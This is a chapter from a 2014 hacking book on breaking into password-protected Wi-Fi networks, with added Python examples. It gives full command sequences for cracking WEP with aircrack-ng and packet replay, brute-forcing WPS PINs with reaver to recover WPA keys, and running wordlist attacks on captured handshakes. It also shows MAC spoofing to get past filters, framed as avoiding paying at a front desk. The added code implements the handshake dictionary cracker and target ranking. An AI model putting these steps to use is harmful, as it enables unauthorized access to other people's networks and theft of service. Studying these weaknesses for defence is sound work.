Wireless hack - A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)

Chapter 8. Wireless hack

We will cover:

* How Wi-Fi encryption works

* Tools for cracking Wi-Fi

* Cracking a WEP wireless password

* Cracking a WPA/WPA2 wireless password

* Cracking Wi-Fi passwords in Windows

* Bypassing MAC address filters

You will often see many wireless networks in range that you cannot use because they are password protected, which is frustrating. In this chapter I show how to recover a Wi-Fi password without much work.

How Wi-Fi encryption works

Wi-Fi has had several encryption schemes. The first, WEP, was easy to break. It was followed by WPA and then WPA2.

WEP (Wired Equivalent Privacy)

For years this was the encryption used on most wireless networks worldwide. WEP turned out to be badly flawed and can be cracked with freely available software; the Wi-Fi Alliance deprecated it in 2004.

WPA (Wi-Fi Protected Access)

WPA was designed as a drop-in replacement for WEP. Its main additions were per-packet keying (TKIP) and a message integrity check (MIC), which lets the receiver detect frames that an attacker captured and altered on their way to the access point. TKIP still runs on RC4 so that existing hardware could be upgraded; it was later superseded by encryption based on the Advanced Encryption Standard (AES). WPA itself also turned out to have weaknesses, and its pre-shared key is open to the dictionary attack covered later in this chapter.

WPA2 (Wi-Fi Protected Access 2)

Because WPA was still vulnerable, WPA2 replaced TKIP with AES in CCMP mode. The encryption itself is, for practical purposes, unbreakable. What can still be attacked is the pre-shared key: a WPA2 network is attacked with exactly the same techniques as a WPA network, either by capturing the handshake and testing passwords against it or by brute-forcing the WPS PIN with reaver, both shown later in this chapter. Expect anywhere from two to fourteen hours; the time depends on the size of your wordlist, or for WPS on how many PINs have to be tried.

Tools for cracking Wi-Fi

There are many tools for Wi-Fi hacking; here I show the most popular ones, the ones used every day in a hacker's life.

The tools

* BackTrack (the Linux distribution used throughout; the airmon-ng, airodump-ng, aireplay-ng and aircrack-ng commands below all belong to its aircrack-ng suite)

* Airmon-ng

* A compatible Wi-Fi card

The biggest requirement is a good wireless adapter; without one you are done before you start. It has to support monitor mode and packet injection and receive packets reliably, or the attacks below will never collect the traffic they need. Below are the adapters I found to work well for this exercise.

Cracking a WEP wireless password

In this exercise we start with cracking WEP.

1. Boot BackTrack to the desktop and open a terminal.

2. To list the network interfaces, type (see Figure 8-1):


Figure 8-1 shows all wireless interfaces listed.

3. Here you can see I have wlan0.

4. Next, put the card into monitor mode with airmon-ng start (interface), so I type:

airmon-ng start wlan0

5. To find the networks in range and pick one, use airodump-ng (interface). airmon-ng created the monitor interface mon0, so I type:

airodump-ng mon0

6. Press Ctrl+C to stop the listing when you see the network you want to attack (see Figure 8-2). Note its BSSID and channel (CH).

Figure 8-2 shows all Wi-Fi networks in the area.

7. Now we focus on that network and capture its packets to a file, using airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface). In my case I type:

airodump-ng -c 6 -w darkknight --bssid 00:05:5D:EC:AA:52 mon0

8. Leave that terminal open, open a second terminal and fake-authenticate our card to the access point (an AP drops frames from stations that are not associated, so this step is needed before replaying) with aireplay-ng -1 0 -a (bssid) mon0

So I type:

aireplay-ng -1 0 -a 00:05:5D:EC:AA:52 mon0

9. Now we generate the large number of packets we need with aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0. This is the interactive packet replay attack: -p 0841 sets the frame control field so the captured frame looks like data sent from a client to the AP, and -c FF:FF:FF:FF:FF:FF makes its destination the broadcast address, so the AP relays every replayed copy with a fresh IV. So I type:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:05:5D:EC:AA:52 mon0

Answer y when aireplay-ng asks whether to use the captured packet. BackTrack then collects packets in bulk; leave it running for a while and watch the #Data column in the first terminal, which counts the initialization vectors (IVs) captured so far.

10. Once you have enough packets (aircrack-ng needs tens of thousands of IVs; this may take five to six hours or more, though when the replay attack is working the IVs often arrive within minutes), open a third terminal and run aircrack-ng on the capture written in step 7. The -w darkknight prefix produces darkknight-01.cap, so I type:

aircrack-ng darkknight*.cap

It should display the recovered key (see Figure 8-3). If it reports failure, keep capturing and run it again with more IVs.

Figure 8-3 shows the key I recovered from my own Wi-Fi during the test.
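The reason collecting packets matters: WEP encrypts every frame with RC4 keyed by a 24-bit IV, sent in the clear, followed by the static key, so a repeated IV means a repeated keystream. The following Python example, added here and not part of the book or of aircrack-ng, shows the simplest consequence: with two frames under the same IV, knowing one plaintext (say a predictable ARP frame) reveals the other without the key, and the birthday bound shows how quickly IVs repeat. The key, IV and frame contents are constructed; aircrack-ng's actual key recovery uses statistical attacks (FMS/PTW) on the same weakness rather than this known-plaintext trick.

```python
import math
import struct
import zlib

# Constructed sample data (not from the book): a 40-bit WEP key, one IV, two frames.
WEP_KEY = b"Ab3dE"                                  # 5 bytes (40-bit); 13 bytes for 104-bit
IV = b"\x01\x02\x03"                                # 24-bit IV, transmitted in the clear
KNOWN_PLAINTEXT = b"ARP request to 192.168.1.1  "   # 28 bytes, assumed known to the attacker
SECRET_PLAINTEXT = b"secret data from the station"  # 28 bytes, what the attacker wants


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (key scheduling + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(payload: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32 of the payload, little-endian."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP encapsulation: RC4 keyed with IV||key over payload||ICV. Returns IV||ciphertext
    (the key-index byte that follows the IV on the air is omitted here)."""
    assert len(iv) == 3 and len(key) in (5, 13)
    data = payload + icv(payload)
    ks = rc4(iv + key, len(data))
    return iv + bytes(a ^ b for a, b in zip(data, ks))


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def recover_keystream(frame: bytes, known_payload: bytes) -> bytes:
    """Keystream for this frame's IV = ciphertext XOR (known payload || its ICV)."""
    return xor(frame[3:], known_payload + icv(known_payload))


def decrypt_with_reused_iv(frame_known: bytes, known_payload: bytes, frame_target: bytes):
    """Two frames with the same IV share a keystream, so the target frame can be read
    without the WEP key. Returns the target payload (ICV stripped), or None if the IVs
    differ or the target is longer than the recovered keystream."""
    if frame_known[:3] != frame_target[:3]:
        return None
    ks = recover_keystream(frame_known, known_payload)
    body = frame_target[3:]
    if len(body) > len(ks):
        return None
    return xor(body, ks)[:-4]


def iv_collision_probability(frames: int) -> float:
    """Birthday bound: probability that at least one IV repeats among `frames` frames
    drawn from the 2**24 possible IVs."""
    return 1.0 - math.exp(-(frames ** 2) / (2 * 2 ** 24))


def demo() -> bytes:
    """Encrypt both sample frames under the same IV and read the secret one."""
    f_known = wep_encrypt(WEP_KEY, IV, KNOWN_PLAINTEXT)
    f_secret = wep_encrypt(WEP_KEY, IV, SECRET_PLAINTEXT)
    return decrypt_with_reused_iv(f_known, KNOWN_PLAINTEXT, f_secret)


if __name__ == "__main__":
    print(demo())
    print(f"P(some IV repeated after 5000 frames) = {iv_collision_probability(5000):.2f}")
```

Run it with python3: it prints the secret frame recovered without the key, and that after only 5,000 frames there is already roughly a 53% chance that some IV has been reused. A busy access point emits that many frames in a few seconds, which is why the replay attack in step 9 is so effective.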

Cracking a WPA/WPA2 wireless password

In this exercise we move on to WPA/WPA2. The tool used here, reaver, does not attack the encryption itself: it brute-forces the PIN of Wi-Fi Protected Setup (WPS) and receives the WPA pre-shared key from the access point once the PIN is right, so it only works against access points that have WPS enabled.

1. Boot BackTrack to the desktop and open two terminals.

2. In the first terminal, type:


The interface will be listed.

3. Then type:

airmon-ng start wlan0

4. Run airodump-ng mon0 to see the networks; I will use the dlink network because it is mine (see Figure 8-4).

Figure 8-4 shows the scan of the Wi-Fi networks in the area, just as before.

Press Ctrl+C to stop the process when you see the network you want to use.

5. Now go to the second terminal and install reaver. First update the package lists:

apt-get update

6. Then install reaver:

apt-get install reaver

7. Now start reaver against the target's BSSID (-vv gives verbose progress):

reaver -i mon0 -b 70:19:70:5A:63:26 -vv

8. Let it run; it can take 2 to 10 hours, and longer if the access point locks WPS for a while after failed PIN attempts. When the PIN is cracked you will see the output in Figure 8-5, including the WPA PSK: "nnoosecretts"

Figure 8-5 shows reaver finding the password after a while.
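What reaver is doing during those hours, as an added Python example (not code from the book or from reaver): the eighth digit of a WPS PIN is a checksum, and the access point confirms the first four digits and the remaining three separately, so the search collapses from the 10^7 valid eight-digit PINs to at most 11,000 attempts. The FakeRegistrar class is a hypothetical stand-in for the access point's WPS registrar, and the PIN 12345670 is constructed for the demonstration.

```python
# Added example: the WPS PIN structure that makes reaver's attack feasible.


def wps_checksum(first_seven: int) -> int:
    """Check digit (8th digit) of a WPS PIN, per the WPS specification: the first
    seven digits are weighted 3,1,3,1,3,1,3 (from the right) and summed mod 10."""
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin8: int) -> bool:
    """True if the 8-digit PIN carries the correct check digit."""
    return 0 <= pin8 <= 99_999_999 and wps_checksum(pin8 // 10) == pin8 % 10


class FakeRegistrar:
    """Hypothetical AP-side WPS registrar (constructed for this example). A real AP
    confirms the first half of the PIN in message M4 and the second half in M6,
    NACKing a wrong half on its own; this stand-in exposes that behaviour directly
    and counts how many answers it gave."""

    def __init__(self, pin8: int):
        self.pin = f"{pin8:08d}"
        self.attempts = 0

    def first_half_ok(self, half: str) -> bool:
        self.attempts += 1
        return half == self.pin[:4]

    def second_half_ok(self, half: str) -> bool:
        self.attempts += 1
        return half == self.pin[4:]


def split_pin_search(reg: FakeRegistrar):
    """The reaver strategy: find the first 4 digits (at most 10,000 tries), then the
    next 3 (at most 1,000 tries, the 8th digit being the checksum). Worst case
    11,000 attempts instead of 10**7."""
    first = None
    for i in range(10_000):
        if reg.first_half_ok(f"{i:04d}"):
            first = f"{i:04d}"
            break
    if first is None:
        return None
    for j in range(1_000):
        seven = first + f"{j:03d}"
        second = f"{j:03d}{wps_checksum(int(seven))}"
        if reg.second_half_ok(second):
            return first + second
    return None


def demo(pin8: int = 12345670):
    """Run the split search against a registrar holding `pin8`; returns (pin, attempts)."""
    reg = FakeRegistrar(pin8)
    return split_pin_search(reg), reg.attempts


if __name__ == "__main__":
    pin, tries = demo()
    print(f"recovered PIN {pin} after {tries} attempts (worst case 11000)")
```

Each real attempt costs a full WPS exchange over the air, typically a second or more, which is where the hours come from; access points that lock WPS after a burst of failures stretch this further, and ones with WPS disabled are immune.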

Cracking Wi-Fi passwords in Windows

Linux is not the only operating system that can crack wireless passwords. aircrack-ng also runs on Windows, and some people find it easier there because of the graphical user interface, so I made an exercise for it.

1. First download the free trial of CommView for WiFi from http://www.tamos.com/download/main/ca.php

It can also be bought from the same site. It is a wireless monitoring tool.

2. Once it is installed, launch CommView (see Figure 8-5) and go to the Nodes tab.

Figure 8-5 shows CommView opened and ready to start sniffing.

3. Click the blue Start button; this opens the scanner dialog. In it, click "Start Scanning".

4. Let it scan until you find the network you want to attack; if you still cannot find it, change the channel (see Figure 8-6). When you have found it, stop scanning and click Capture.

Figure 8-6 shows the Wi-Fi networks in the area being scanned.

5. WPA cracking is different from WEP cracking: for WPA you have to capture a handshake between a client and the access point, and that only happens when a client connects or reconnects. That being said, I recommend leaving the capture running to increase the chance of catching a handshake.

6. When you think you have enough, stop capturing, go to the Logging tab, click Concatenate Logs and save the result under any file name on the Desktop (see Figure 8-7).

Figure 8-7 shows how the settings should look when you are about to save the log file.

7. Now go to File -> Log Viewer. Once the dialog opens, go to File -> Load CommView Logs... and load the file you just saved.

8. Then go to File -> Export Logs -> Wireshark/Tcpdump Format..., give it a name and save.

9. Now go to www.aircrack-ng.org/install.html, click "Pre-compiled" and download the Windows package, which contains Aircrack-ng GUI.exe (see Figure 8-8).

Figure 8-8 shows the Aircrack-ng GUI running, ready to crack the file.

10. Set the encryption to WPA, click Choose next to Wordlist and browse to the text file with your candidate passwords, for example "password list.txt". Then click Launch.

11. This opens a command prompt listing all the networks in the capture; the encryption column shows whether a handshake was captured for each (see Figure 8-9).

Figure 8-9 shows the prompt where you select the network whose handshake you captured.

Choose the index number of the target network; in my case I chose 5.

12. Aircrack-ng then tests the candidate passwords one by one. When it finds the password it stops and shows the key found (see Figure 8-10). If it runs through the whole wordlist without a match, the passphrase simply is not in your list: this attack is only as good as the wordlist.

Figure 8-10 shows the output when the password was found.

And that is how you find a Wi-Fi password in Windows, fairly easily, using only a graphical user interface.
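Why the same technique cracks WPA and WPA2, and why the wordlist decides success, as an added Python example (not code from the book, CommView or aircrack-ng) that covers both this section and the WPA2 paragraph at the start of the chapter: the passphrase is stretched with PBKDF2 into the pairwise master key (PMK); the PMK together with both MAC addresses and both nonces from the handshake yields the pairwise transient key (PTK); and the first 16 bytes of the PTK key the MIC on handshake message 2. Each candidate password either reproduces the captured MIC or it does not, entirely offline, and WPA (TKIP) and WPA2 (CCMP) differ only in the hash used for that MIC. The SSID, MAC addresses and passphrase are the ones the chapter shows for the author's own dlink network; the nonces, the EAPOL frame bytes and the wordlist are constructed.

```python
import hashlib
import hmac

# Constructed sample handshake (not a real capture). SSID, MACs and passphrase are
# those the chapter shows for its dlink network; nonces and EAPOL bytes are made up.
SSID = "dlink"
AP_MAC = bytes.fromhex("7019705A6326")       # 70:19:70:5A:63:26 (authenticator)
STA_MAC = bytes.fromhex("00123E783F7F")      # 00:12:3E:78:3F:7F (supplicant)
ANONCE = bytes(range(32))                    # constructed 32-byte AP nonce
SNONCE = bytes(range(32, 64))                # constructed 32-byte station nonce
# Constructed stand-in for EAPOL-Key message 2 with its 16-byte MIC field zeroed.
EAPOL_MSG2 = bytes.fromhex("0103007502010a00") + bytes(109)
REAL_PASSPHRASE = "nnoosecretts"             # the network's PSK, unknown to the attacker


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The 4096 iterations are what make each wordlist candidate cost something."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """Derive the PTK and return its first 16 bytes, the Key Confirmation Key (KCK),
    which keys the EAPOL MIC. MACs and nonces are ordered min||max as the standard requires."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)[:16]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, wpa2: bool) -> bytes:
    """Key descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) uses
    HMAC-SHA1 truncated to 16 bytes; both run over the frame with the MIC field zeroed."""
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, eapol_mic_zeroed, digest).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_mic_zeroed,
                    captured_mic, wordlist, wpa2=True):
    """Offline dictionary attack: PMK -> PTK -> KCK for each candidate, then compare
    the MIC it produces with the one sniffed in message 2. Returns the match or None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_mic_zeroed, wpa2), captured_mic):
            return candidate
    return None


def sample_captured_mic(wpa2: bool = True) -> bytes:
    """What a sniffer would see in message 2 of the sample handshake (computed here
    from the real passphrase, which the attacker does not have)."""
    pmk = pmk_from_passphrase(REAL_PASSPHRASE, SSID)
    return eapol_mic(kck_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE), EAPOL_MSG2, wpa2)


def demo(wordlist=("password", "dlink123", "nnoosecretts", "letmein"), wpa2=True):
    """Run the attack against the sample handshake with a constructed wordlist."""
    return crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2,
                           sample_captured_mic(wpa2), wordlist, wpa2)


if __name__ == "__main__":
    print("WPA2/CCMP:", demo(wpa2=True))
    print("WPA/TKIP :", demo(wpa2=False))
    print("wrong list:", demo(wordlist=["password", "letmein"]))
```

Everything the attack needs (both MACs, both nonces, message 2 and its MIC) is on the air during one association, which is why the Windows exercise waits for a handshake and why nothing else about the capture matters. Note that a passphrase not in the wordlist is never found, no matter how long the tool runs.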

Bypassing MAC address filters

Sometimes you have the password for a Wi-Fi network in the area but your MAC address is not on its allow list. For example, you might have to pay at the front desk before your device is given full access to the Wi-Fi and the Internet. Here I show how to bypass the MAC address filter.

1. Boot BackTrack to the desktop and open a terminal.

2. Now type:

airmon-ng start wlan0

airodump-ng mon0

3. Copy the BSSID of the network we want to get into; mine is: 98:FC:11:69:E6:07

4. Now we watch that network for packets from its clients, using airodump-ng -c [channel] -a --bssid [bssid] mon0 (-a shows only stations that are actually associated with the access point). That means I type:

airodump-ng -c 9 -a --bssid 98:FC:11:69:E6:07 mon0

5. Now we wait until some client MAC addresses appear under STATION (see Figure 8-11).

Figure 8-11 shows client MAC addresses listed under STATION.

6. Once you see a MAC address under STATION, copy it; that client has already passed the filter. Mine is 00:12:3E:78:3F:7F

7. Stop the monitor interface first so the card can associate normally (airmon-ng stop mon0), then take the interface down, give it the client's MAC address and bring it back up:

ifconfig wlan0 down

macchanger -m 00:12:3E:78:3F:7F wlan0

ifconfig wlan0 up

8. Now launch the wireless manager: Start -> Internet -> Wicd Network Manager.

9. Disconnect from everything, refresh, and connect to the network whose filter you bypassed; it should work.

Sometimes after bypassing the MAC filter you lose Internet access. The client whose address you cloned is usually still on the network, and two stations with the same MAC address disturb each other; it may also be that the administrator noticed the spoofed address and kicked you out.
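When run with -w, as in the WEP section, airodump-ng also writes a text file next to the capture (the prefix darkknight gives darkknight-01.csv) holding the same BSSID and STATION tables the screen shows. The following Python example, added here and not from the book or from aircrack-ng, parses that CSV to rank the networks by encryption (open, WEP, WPA, WPA2) and to list the clients associated with a given BSSID, which is exactly the MAC address you want to clone in step 6. The CSV text is a constructed sample in airodump-ng's layout using the chapter's BSSIDs and station MAC; the ESSID HotelWifi, the timestamps and the counters are made up.

```python
# Added example: read airodump-ng's prefix-01.csv to pick targets and clients.

# Constructed sample in airodump-ng's CSV layout. BSSIDs and the station MAC are
# the ones this chapter uses; ESSID "HotelWifi", timestamps and counters are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:05:5D:EC:AA:52, 2014-01-10 20:01:12, 2014-01-10 20:05:40,  6,  54, WEP , WEP, OPN, -61,  412, 9530,   0.  0.  0.  0,  10, darkknight, 
70:19:70:5A:63:26, 2014-01-10 20:01:13, 2014-01-10 20:05:41, 11,  54, WPA2, CCMP, PSK, -70,  380,    0,   0.  0.  0.  0,   5, dlink, 
98:FC:11:69:E6:07, 2014-01-10 20:01:15, 2014-01-10 20:05:41,  9,  54, OPN , , , -55,  401,    0,   0.  0.  0.  0,   9, HotelWifi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:12:3E:78:3F:7F, 2014-01-10 20:02:01, 2014-01-10 20:05:39, -48,      212, 98:FC:11:69:E6:07, HotelWifi
00:1C:B3:09:85:15, 2014-01-10 20:03:10, 2014-01-10 20:05:12, -80,        3, (not associated), darkknight,dlink
"""

# Weakest first. airodump prints e.g. "WPA2 WPA" for mixed mode, so rank the weakest token.
PRIVACY_RANK = {"OPN": 0, "WEP": 1, "WPA": 2, "WPA2": 3}


def parse_airodump_csv(text: str):
    """Return ({bssid: ap_info}, [station_info]) from airodump-ng CSV text.
    Fields are split on ',' and stripped. The last station column (probed ESSIDs)
    is itself comma separated, so everything after the BSSID column is folded into it."""
    aps, stations, section = {}, [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        f = [x.strip() for x in line.split(",")]
        if f[0] == "BSSID":
            section = "ap"
            continue
        if f[0] == "Station MAC":
            section = "sta"
            continue
        if section == "ap" and len(f) >= 14:
            aps[f[0]] = {"channel": int(f[3]), "privacy": f[5], "cipher": f[6],
                         "auth": f[7], "power": int(f[8]), "ivs": int(f[10]),
                         "essid": f[13]}
        elif section == "sta" and len(f) >= 6:
            stations.append({"mac": f[0], "power": int(f[3]), "packets": int(f[4]),
                             "bssid": f[5], "probed": [p for p in f[6:] if p]})
    return aps, stations


def weakest_first(aps):
    """(essid, bssid, privacy, channel) tuples, easiest target first."""
    def rank(item):
        tokens = item[1]["privacy"].split() or ["OPN"]
        return min(PRIVACY_RANK.get(t, 9) for t in tokens)
    return [(a["essid"], b, a["privacy"], a["channel"])
            for b, a in sorted(aps.items(), key=rank)]


def clients_of(stations, bssid):
    """MAC addresses associated with `bssid`, busiest first: the candidates to clone
    with macchanger when the network filters on MAC address."""
    assoc = [s for s in stations if s["bssid"] == bssid]
    return [s["mac"] for s in sorted(assoc, key=lambda s: -s["packets"])]


def demo(bssid: str = "98:FC:11:69:E6:07"):
    """Parse the sample and return (ranked targets, clients of `bssid`)."""
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    return weakest_first(aps), clients_of(stations, bssid)


if __name__ == "__main__":
    targets, clients = demo()
    for essid, bssid, privacy, channel in targets:
        print(f"{essid:12} {bssid} {privacy:5} ch {channel}")
    print("MAC addresses already through the filter:", clients)
```

Prefer the client with the most packets: it is the one whose address is known to be accepted, but it is also the one you will collide with, which is the cause of the dropped connections mentioned above.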

Summary

* WEP is the most vulnerable Wi-Fi encryption.

* WPA2 is the strongest Wi-Fi encryption; the attacks that work against it target the pre-shared key (a dictionary attack on a captured handshake) or WPS, not the cipher itself.

* CommView (on Windows), the aircrack-ng suite (airmon-ng and friends) and a compatible Wi-Fi card are the requirements for Wi-Fi hacking.

* If the adapter is not good enough you will not capture enough packets to carry out the attack.

* MAC address filtering can be bypassed from BackTrack by cloning the MAC address of an allowed client.